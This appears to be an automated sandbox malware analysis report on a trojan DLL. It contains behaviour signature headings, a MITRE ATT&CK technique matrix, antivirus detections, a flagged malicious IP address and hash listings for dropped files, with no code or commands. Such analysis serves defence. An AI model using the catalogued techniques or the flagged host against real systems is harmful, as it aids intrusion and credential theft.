Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | |||
Source: | Memory protected: |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior |
Source: | Thread created: | Jump to behavior | ||
Source: | Thread created: | Jump to behavior | ||
Source: | Thread created: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | |||
Source: | Process created: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 3_2_01003365 |
Source: | Key value queried: | Jump to behavior |
Source: | Code function: | 3_2_05B781F1 |
Source: | Code function: | 3_2_01004B89 |
Source: | Code function: | 3_2_01006D78 |
Source: | Code function: | 3_2_01003365 |
Stealing of Sensitive Information |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 Valid Accounts | 1 Windows Management Instrumentation | 1 Valid Accounts | 1 Valid Accounts | 1 Obfuscated Files or Information | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact |
Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 File Deletion | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 813 Process Injection | 1 Masquerading | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Valid Accounts | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Access Token Manipulation | LSA Secrets | 1 Query Registry | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 11 Security Software Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 813 Process Injection | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Rundll32 | Proc Filesystem | 3 Process Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 System Owner/User Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 11 Remote System Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop | ||
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | 1 System Network Configuration Discovery | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
41% | ReversingLabs | Win32.Trojan.Lazy | ||
100% | Joe Sandbox ML |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1245293 | Download File |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
4% | Virustotal | Browse | ||
100% | Avira URL Cloud | phishing | ||
100% | Avira URL Cloud | phishing | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | phishing | ||
0% | URL Reputation | safe | ||
100% | Avira URL Cloud | phishing | ||
100% | Avira URL Cloud | phishing | ||
100% | Avira URL Cloud | phishing | ||
0% | URL Reputation | safe |
⊘No contacted domains info
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
true |
| unknown | ||
true |
| unknown | ||
false |
| low | ||
false |
| unknown | ||
true |
| unknown | ||
true |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
176.10.119.68 | unknown | Switzerland | 51395 | AS-SOFTPLUSCH | true |
IP |
---|
192.168.2.1 |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 633919 |
Start date and time: 25/05/202211:25:19 | 2022-05-25 11:25:19 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 14m 51s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | zs5n5sI6N2 (renamed file extension from none to dll) |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 42 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 2 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.bank.troj.evad.winDLL@29/29@0/2 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 52.182.143.212, 13.89.179.12, 13.107.42.16
- Excluded domains from analysis (whitelisted): fs.microsoft.com, config.edge.skype.com.trafficmanager.net, onedsblobprdcus17.centralus.cloudapp.azure.com, arc.msn.com, onedsblobprdcus15.centralus.cloudapp.azure.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com
- Execution Graph export aborted for target mshta.exe, PID 6732 because there are no executed function
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description |
---|---|---|
11:26:44 | API Interceptor | |
11:26:57 | API Interceptor | |
11:27:42 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
176.10.119.68 | Get hash | malicious | Browse |
⊘No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
AS-SOFTPLUSCH | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
⊘No context
⊘No context
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_2ce29cfeeebc853567a148791f146b4541ff5338_7cac0383_0c0874ee\Report.wer
Download File
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.7414878379061339 |
Encrypted: | false |
SSDEEP: | 96:29L4VnYyey9hasCj+ASZpXIQcQac6pcEccw35+a+z+HbHghownOgtYsXqOEX/vFW:sqn1H0tGtjCq/u7sDS274Itb |
MD5: | 3122AD34CF8329BB6EBD0E8D111E4087 |
SHA1: | 999CAA75892DB4C0844D7B460220CB9B21C1EA19 |
SHA-256: | F71BA276707F0E7720708EB5D9CC9D6EC23AC2252083F5BB6A29CE5794C1DC78 |
SHA-512: | 9B75B1C2B4EC3D11BEB712870BE21D840884544275942D3D64DAE23CB9F1534924923A972A69557F09B2BC21D48645D6C03CAFB8ECE21034229CD3C88FF0EE21 |
Malicious: | false |
Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_34661168243cfabc5e1ee2a141f8dfa8ff2298_7cac0383_1454ac5a\Report.wer
Download File
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.7447297265547901 |
Encrypted: | false |
SSDEEP: | 96:gZFhVnYy9y9hasCjmfspXIQcQJc6VccEBFcw3Brq+a+z+HbHghownOgtYsXqOEXY:URnZHnJcphwjCq/u7sDS274ItW |
MD5: | 612790C6049DF86989352C75FF80C799 |
SHA1: | 51B73A9F377C7703629EF594D7CC822C6239704B |
SHA-256: | C60E7DF72E6F2DD6CFD266A9FFF1F6F235201D378811529C6901FDEE6348B85B |
SHA-512: | 8D45A9C7256636A634982AC9DEA5D9DC6BF58E4F24DA8824616BEAB97CCAF7EC15A3BDCFBAC8E814DC2A323F7452C5B4B47069CA1B942410F3B161E0B42DDB7F |
Malicious: | false |
Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_5a7bdef4ffd6df7a7664cf7158b49db77a1e6c9_7cac0383_07688b93\Report.wer
Download File
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.7488102922693348 |
Encrypted: | false |
SSDEEP: | 96:EtFlgVnYyDy9haot7Jn4pXIQcQac6pcEccw35+a+z+HbHghownOgtYsXqOEX/vF9:8WnlH0tGtjCq/u7sDS274ItW |
MD5: | 18E4E82637478C9977F4CC69CE04C054 |
SHA1: | 8F47765B89680E02345DBFCD7D646ECD232BE62F |
SHA-256: | 62F8AC43AF175660855F62EEBBD281264AD13653A75653048C5A9F6F2D00DE4D |
SHA-512: | E13E01D9F600F1866C61D5278FFE22FCEC540CAE891EEF19F4F13E87B83C92EBA5C28B2FE332806842CD175F6E82B55BC7DCCA8DBC3A1FBCF187A356A3DD0BCE |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 34890 |
Entropy (8bit): | 2.0871699584549472 |
Encrypted: | false |
SSDEEP: | 96:5h8oF8NGYG/9CHM1hgnoi710/DQ1rIa2gJzF32OKvnZheGWIRWIXAI4EnJBwga1H:ULG/51hgoO1Brp24GOYziEJBwgaTyw9 |
MD5: | F0C9AFEE351CEECD0EE114CFBF699D21 |
SHA1: | 7F8074F0115265A26B9C377AFC6E15DD905C88AC |
SHA-256: | 18C525091F3CF41C96831ED38A66FE7E8772F467E446666E78B449927BA2CFDF |
SHA-512: | EE087C5146560C1EA08C620826DAA464747873278731EBDFC65327FF11479397CAD5F91C00B90E7B47F2FE13F3CFB592FC53DA6879D52CFF42B39C6B737109AF |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8346 |
Entropy (8bit): | 3.692217837765199 |
Encrypted: | false |
SSDEEP: | 192:Rrl7r3GLNi+n6bfZm6Y4TSUtsgmfISG+pN389bEB1f5MMm:RrlsNie6Fm6YMSUtsgmfISkEDfc |
MD5: | 789351A69FF01E029E9232B20548C291 |
SHA1: | 1B5B4A91729BE69471015008A1DAD5827E72F1AD |
SHA-256: | 28D990D18B807EB7743AE19CBB32EBAED164A4711E0B9C699E9630AA75DF1147 |
SHA-512: | B0BCAE5A4ACF5B2E96390251D45E8D1FCD7E66CA6F7616356BFD2AD9D7908C1810E6ACEAAC8965E11597CA89001A1FE90AC7236BA73A0B8653B62680591F3F13 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4659 |
Entropy (8bit): | 4.4259860118465895 |
Encrypted: | false |
SSDEEP: | 48:cvIwSD8zsRGJgtWI9qkWgc8sqYjR8fm8M4J2+nFJ+q8vQ+GdKcQIcQw0cd:uITfRcR9grsqYqJZKadKkw0cd |
MD5: | 76F9EB4132E4B59649BB0CD22F905041 |
SHA1: | D80A6535CECCEDEFF04EDD4D83E9EDCCE2B7A9FE |
SHA-256: | 22B8C3BC47CFDCC2DF8D5C12A9B9B45302C87A01AC9AB4734F5DCFC4FDC06883 |
SHA-512: | 0D2986DDC0B5D6AD3CADDEA6AA3600F864EC6069AC3E2A7D1EDC4C13354F75F367F83444984F6B3AD7C3F4CB811785322DC6D6090F34386E3D31251110359982 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 34690 |
Entropy (8bit): | 2.0271582616456114 |
Encrypted: | false |
SSDEEP: | 192:jap/V6OOdO1SqQ8OYziEi41/fCltDOs+c7qy:cBOQ1GYLi4xC5 |
MD5: | 98823C3E4F054A9165D438EC4E2CEB1C |
SHA1: | 051919123D1748F229F193164FECCE69812CA866 |
SHA-256: | DB59C27D1626DA7874EE219BADAAA298206B57DADFFE33BE9C8450D3D7484335 |
SHA-512: | 39DD7AFE4D239B7FD65B96799E7AB437B2FF8A46C49830F3F859E86723BF8F01780F6F1680971EF005B170CC978A639896D9C513E68CD33F1684E784EDFF1F56 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8334 |
Entropy (8bit): | 3.700853069434835 |
Encrypted: | false |
SSDEEP: | 192:Rrl7r3GLNi+q6bfEM6Y4CSU7jmjTgmfJSG+prO89bZhsfhzm:RrlsNiD6YM6YNSUXmjTgmfJSNZafY |
MD5: | F17272FA1DC6E944333E729B686AC8BF |
SHA1: | A2E3FB6A6488B24F8FD3F70D3BA0F38E339527C7 |
SHA-256: | 8B35122280A22F36A355172B77CC9E0FBF6E4E3C9A74396850043B7F7E3675CF |
SHA-512: | CF1E6CB0A4EEEEE9655DD01122F966E4C65B5A32606D0DBB147BC4BAC8A6C7AC3E3606082770B631D46D2D95144271A0C4F99CBEC577C15C03AA41E223985B9D |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4598 |
Entropy (8bit): | 4.469500510780283 |
Encrypted: | false |
SSDEEP: | 48:cvIwSD8zsRGJgtWI9qkWgc8sqYjq8fm8M4J2+EZFV+q849hYdKcQIcQw09d:uITfRcR9grsqYzJKprYdKkw09d |
MD5: | FBDC6EC9B2BD979AFA8A53D339B3D0B0 |
SHA1: | E7F7A92AC9B2945B91CF2487BCA9463015E0E39B |
SHA-256: | 908D3289EBFABE37133537239D2AA37249ABD4950E0C01B6B698FB11E3240B2C |
SHA-512: | 454FEAE4EC651A1358A949D0CCCD895265ECA8B654B9D11D7E3EC00DFD082F1A6AD0A206FB22B217FF6489A1F4B5AC5A8D630FBF50F27D6CF48C728C9F12A4B6 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 47714 |
Entropy (8bit): | 2.2902635791349857 |
Encrypted: | false |
SSDEEP: | 192:Oqz/TzQWQpBO1wwzp2PiWpUrBGyL3TVgKFdzhRygvugloYxOOYzUEqqCGNmDN8Qo:ndL1Rpw+rgyfSeZhDvsYx5Y5qqxV |
MD5: | 0FC4337E7B15D8ABB2CD6C659E08B905 |
SHA1: | 7CE7EB1E2790D30232654AB47D5453CE97A0F618 |
SHA-256: | 084CA58989DD4CF4FFB474DBD33375FD916E5F9C66028AD515776FD792EB7A15 |
SHA-512: | 1C07F7850F69149ABCA03F0DA7FE500FA65DE4FDAC77CA04DC0DA08DB121B6A1FE598211EC0BDB878257D70FB79233E9BFB3EBD87C647A830FF55D9648D0A5B0 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8290 |
Entropy (8bit): | 3.693325525971125 |
Encrypted: | false |
SSDEEP: | 192:Rrl7r3GLNi+L6b+c6Y4iSUJZmgmfDSitl+pDr89bjhsf2hm:RrlsNi66Cc6YNSUJogmfDSsjafh |
MD5: | F26E02402044828537B8F1E48C9AED33 |
SHA1: | 9A3F38DA9BBC6B8CC52AACBA76BB035B5C429FC6 |
SHA-256: | 8BB6A39C1780F107AF1BD5AE064536CC39C55B189CDFE9E468EB513FF8A3C511 |
SHA-512: | 86398A402390F4896C623A77DF832580C843C351FC1A6488F912B4AAE9CEC66B7C020CD5CF0A6145F22B15C51D26C3573F5A2CFC718AC46D14F4EFE539EBC6CF |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4558 |
Entropy (8bit): | 4.435949177836784 |
Encrypted: | false |
SSDEEP: | 48:cvIwSD8zsRGJgtWI9qkWgc8sqYjC8fm8M4J2+wFoml+q84BydKcQIcQw09d:uITfRcR9grsqYrJGlodKkw09d |
MD5: | 7F80AD412C3577DDB6529872079E5DC2 |
SHA1: | 6A49967DC7C2A9F9A006CFCB0B8B0841CEBA3C20 |
SHA-256: | 70D44B739211FE25940AA6074488F57E481D0EDC6151ECE1FAEB6BF4AC576349 |
SHA-512: | B910A709F8DE77ADFF935F931A15DE448CDA1FE689D61F8CC6E172E3CB4370288996ABAA8B095B045DD88AB137B6A74D3EDCF14450F5CEDCDEE9B53A0AB8E548 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11606 |
Entropy (8bit): | 4.8910535897909355 |
Encrypted: | false |
SSDEEP: | 192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ |
MD5: | F84F6C99316F038F964F3A6DB900038F |
SHA1: | C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1 |
SHA-256: | F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E |
SHA-512: | E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1192 |
Entropy (8bit): | 5.325275554903011 |
Encrypted: | false |
SSDEEP: | 24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5 |
MD5: | 05CF074042A017A42C1877FC5DB819AB |
SHA1: | 5AF2016605B06ECE0BFB3916A9480D6042355188 |
SHA-256: | 971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650 |
SHA-512: | 96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 392 |
Entropy (8bit): | 4.988829579018284 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy |
MD5: | 80545CB568082AB66554E902D9291782 |
SHA1: | D013E59DC494D017F0E790D63CEB397583DCB36B |
SHA-256: | E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C |
SHA-512: | C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 369 |
Entropy (8bit): | 5.225931084277001 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fyL4qzxs7+AEszIwkn23fyL4hyAn:p37Lvkmb6KRfK0qWZEifK0hyA |
MD5: | 1147F18A3762C2E65411CE6823AF9BC9 |
SHA1: | 6ECE2426A2EFF916432894517BB4FE044C19EB41 |
SHA-256: | A0BA5C47D8E295B98D5632BE399DB0266EC788A498EE38B1F866606CF0371CFE |
SHA-512: | 59AEC2E13CD44C74F199087DC9ACF1B0783AE18A1A1AA6EA2A21E21FE01C4B23856D5B13D1C6059B22647E497D525846E925B8E88DB147B109BC6D01316963F1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.590914792113435 |
Encrypted: | false |
SSDEEP: | 24:etGSw/u2Bg85z7xlfwZD6KegdWqtkZfl7ttzWI+ycuZhNBakSvPNnq:6BYb5hFCD6KfWdJl7q1ulBa3tq |
MD5: | 2456F4F945820582283911A7EFBBAB4A |
SHA1: | A4D366666624B4B4BDC85D0D43AD42D5B143EAAE |
SHA-256: | 04FAD7B77D41905FAAC17B0633940B8026808CC4296EB0669106D92F76998D48 |
SHA-512: | BE02502697D386EF07E704980E208710BA31838B1E7A53D96B28C73BC5819CF2A69386212774AB30CDBE2E3FA465A2A17E099F72D167DB917B0E29A0929589AD |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 866 |
Entropy (8bit): | 5.320005711190707 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KRfK0LEifK0E1KaM5DqBVKVrdFAMBJTH:Akka6CK0LEuK0E1KxDcVKdBJj |
MD5: | 3D782FAB19C707768E41E7C6FD17F9CE |
SHA1: | BDDE99DA59D61B59428B4AFBE9E80DBF099A337A |
SHA-256: | A7AA49D3BB4509B2E29CA40A4F7ACE22DF519B30A70E9D8559285413DF09F1E5 |
SHA-512: | 504959F1550C284059481377EEDCD0EBA18FCE37CB712978E9384D1265D337656206CF917B957B2F62155C04211D46B53ECCB1866035AF079EFB5D1E297D2AD1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.084270469417881 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryDak7YnqqvPN5Dlq5J:+RI+ycuZhNBakSvPNnqX |
MD5: | CFBBE6F0EEA525E68A757A7B26894059 |
SHA1: | 1C7A114ED6AE3438F26D4CD42693C46C4C75B183 |
SHA-256: | B9C36592225D7FEDEA84BDA23F6C6A58AA6C7C63C3F2B15A397C8E8B415A35B3 |
SHA-512: | B0D4A223CD38A398F74D16393F30CD8DAF05C4F47D1DF538B373A78918D86F1F6D191BDDC325D8EE783E8741FC70305038507EA008C29396112964A22B83CE00 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1328 |
Entropy (8bit): | 3.9878869287849548 |
Encrypted: | false |
SSDEEP: | 24:H/e9EuZfnB08DfHYhKdNWI+ycuZhNmakSuPNnq9qd:mBBH6Kd41ulma3yq9K |
MD5: | 3608CB888C2146BE6248E3EC15D708A2 |
SHA1: | DF5A4DE39B0509EDC21713E7A845ABA69A174A2F |
SHA-256: | 41BCA26ACE483C3A60E081F82CAA1ABBEC23FEBB13944D95879AE77B7907C67B |
SHA-512: | 9947B5D2268F94CF8AF79477FB8CFEFEC12AA3DC700E04639FD75A3835FF0452A7683424F661DAAE18F4CBE0F831F1BEEA12DD9FB76A2502B7CECC63B1F98AB8 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1328 |
Entropy (8bit): | 3.989795686656622 |
Encrypted: | false |
SSDEEP: | 24:H3e9E2+fKMmwUcDfHchKdNWI+ycuZhNBakSvPNnq9qd:JKpKOKd41ulBa3tq9K |
MD5: | 67B35BBF8CFA938C7974E498B4E179F3 |
SHA1: | ADA46C31936B0C64A83F3B8017245EF5053C7177 |
SHA-256: | C3818266B1CD84EDC45414C3BBFF11136345086CBC911B0FA8D21E8BC7A440A6 |
SHA-512: | F9FD32A04842C528E2AAA9F8B47053AE800FDB9C9DEAA445F1BF9D6EBAF4A1B5FA48CC055BCADC821BB147E0F3D5AE1ED0C198A65BAA25C2199A5994D28CEBF6 |
Malicious: | false |
Preview: |
